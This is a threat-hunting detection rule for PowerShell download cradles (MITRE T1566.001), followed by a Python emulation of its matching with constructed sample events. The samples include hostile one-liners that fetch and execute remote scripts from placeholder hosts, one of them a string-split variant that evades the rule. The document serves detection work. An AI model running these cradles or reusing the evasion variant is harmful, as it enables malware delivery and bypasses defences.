title: Powershell MalDoc
description: This test uses PowerShell to download a maldoc. The query below finds command-line or command-script downloads that use several of the download cradle methods documented by HarmJ0y at https://gist.github.com/HarmJ0y/bb48307ffa663256e239. The query is intended for hunting only (not alerting) and covers most unobfuscated PowerShell cradles; obfuscated or string-split cradles will not match these literal substrings.
author: keyboardcrunch
date: 10/10/2020
modified: null
mitre:
  tactic: Initial Access
  technique: T1566
  subtechnique: 001
operating_system: windows
query: (SrcProcCmdLine In Contains Anycase ("Net.WebClient","(iwr","DownloadString(","WinHttp.WinHttpRequest","IEX (","InternetExplorer.Application","Msxml2.XMLHTTP","MSXML2.ServerXMLHTTP") OR SrcProcCmdScript In Contains Anycase ("Net.WebClient","(iwr","DownloadString(","WinHttp.WinHttpRequest","IEX (","InternetExplorer.Application","Msxml2.XMLHTTP","MSXML2.ServerXMLHTTP"))
false_positives: null
tags: null
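To show what the query above does and does not catch, here is an added Python emulation of its matching logic (case-insensitive substring search across SrcProcCmdLine and SrcProcCmdScript, as "In Contains Anycase" does). This is not part of the original rule and is not SentinelOne's query engine; the sample events are constructed for illustration, and the example.invalid hostnames are placeholders. The last two events show how a cradle with no space after IEX and with its strings split slips past the literal substrings, which is why the rule is limited to unobfuscated cradles and hunting use.

```python
# Substrings from the hunting query above. SentinelOne's "Contains Anycase"
# is a case-insensitive substring match, so we lower-case both sides.
CRADLE_PATTERNS = [
    "Net.WebClient",
    "(iwr",
    "DownloadString(",
    "WinHttp.WinHttpRequest",
    "IEX (",
    "InternetExplorer.Application",
    "Msxml2.XMLHTTP",
    "MSXML2.ServerXMLHTTP",
]


def matched_patterns(text):
    """Return the query substrings found in text, case-insensitively."""
    if not text:
        return []
    lowered = text.lower()
    return [p for p in CRADLE_PATTERNS if p.lower() in lowered]


def evaluate(event):
    """Emulate the query: match on SrcProcCmdLine OR SrcProcCmdScript.

    Returns a dict of field -> matched substrings; empty dict means no hit.
    """
    hits = {}
    for field in ("SrcProcCmdLine", "SrcProcCmdScript"):
        found = matched_patterns(event.get(field, ""))
        if found:
            hits[field] = found
    return hits


# Constructed sample events (not real telemetry). Events 0-3 are unobfuscated
# cradles the query is meant to find; event 4 is a lightly obfuscated cradle
# that evades the literal substrings; event 5 is benign.
SAMPLE_EVENTS = [
    {"SrcProcCmdLine": 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/doc.ps1\')"'},
    {"SrcProcCmdLine": "powershell -c \"$r = New-Object -ComObject WinHttp.WinHttpRequest.5.1; $r.Open('GET','http://example.invalid/x',$false)\""},
    # Cradle lives in the script body, not the command line: SrcProcCmdScript catches it.
    {"SrcProcCmdLine": "powershell -File stage.ps1",
     "SrcProcCmdScript": "$x = New-Object -ComObject Msxml2.XMLHTTP; $x.open('GET', 'http://example.invalid/m', $false)"},
    # 'iex(' has no space, so "IEX (" does not fire, but the other two substrings do.
    {"SrcProcCmdLine": 'powershell -c "iex(New-Object System.Net.WebClient).DownloadString(\'http://example.invalid/a\')"'},
    # No space after IEX and class/method names split into concatenated strings: no substring matches.
    {"SrcProcCmdLine": "powershell -c \"IEX(New-Object ('Net.'+'WebClient')).('Download'+'String').Invoke('http://example.invalid/b')\""},
    {"SrcProcCmdLine": 'powershell -c "Get-Content file.txt"'},
]


def run(events=SAMPLE_EVENTS):
    """Evaluate every event and return the per-event hit dicts in order."""
    return [evaluate(e) for e in events]


if __name__ == "__main__":
    for i, hits in enumerate(run()):
        print(f"event {i}: {'HIT ' + str(hits) if hits else 'no match'}")
```

Running it shows hits on events 0 through 3 and none on events 4 and 5. Anything that evades the substrings (concatenated strings, backtick escapes, base64 -EncodedCommand, a cradle with `IEX(` and no space) needs script-block logging or a decoded-command field rather than this raw command-line match.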